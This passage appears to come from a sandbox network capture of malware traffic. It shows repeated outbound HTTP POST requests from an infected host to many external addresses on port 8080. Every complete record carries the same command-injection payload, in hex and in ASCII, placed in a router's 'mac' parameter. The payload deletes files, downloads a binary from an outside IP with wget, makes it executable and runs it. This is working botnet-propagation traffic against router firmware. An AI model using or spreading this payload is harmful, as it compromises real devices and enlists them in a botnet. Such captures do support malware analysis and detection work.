                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1681192.168.2.2335256113.217.217.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417675972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1682192.168.2.2339730166.216.132.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417687893 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1683192.168.2.2342458169.91.235.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417711973 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1684192.168.2.2358618190.214.69.1658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417717934 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1685192.168.2.235495279.219.246.1858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417756081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1686192.168.2.2348342117.246.122.768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417774916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1687192.168.2.2337542149.182.15.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417876005 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1688192.168.2.233606491.207.223.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417892933 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1689192.168.2.2339268182.107.218.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417932987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1690192.168.2.234952054.158.56.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417964935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1691192.168.2.2338248190.176.248.2338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417964935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1692192.168.2.235056431.99.108.1328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417984962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1693192.168.2.23402889.29.46.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418000937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1694192.168.2.235027038.106.36.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418021917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1695192.168.2.2353322156.148.159.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418036938 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1696192.168.2.235634424.131.241.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418047905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1697192.168.2.2358652154.37.73.2168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418065071 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1698192.168.2.23427685.190.208.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418190002 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1699192.168.2.2354876143.1.160.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418235064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1700192.168.2.2360344109.243.213.2428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418232918 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1701192.168.2.2351176195.147.87.1428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418240070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1702192.168.2.234124057.72.50.1538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418283939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1703192.168.2.2352920197.54.125.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418288946 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
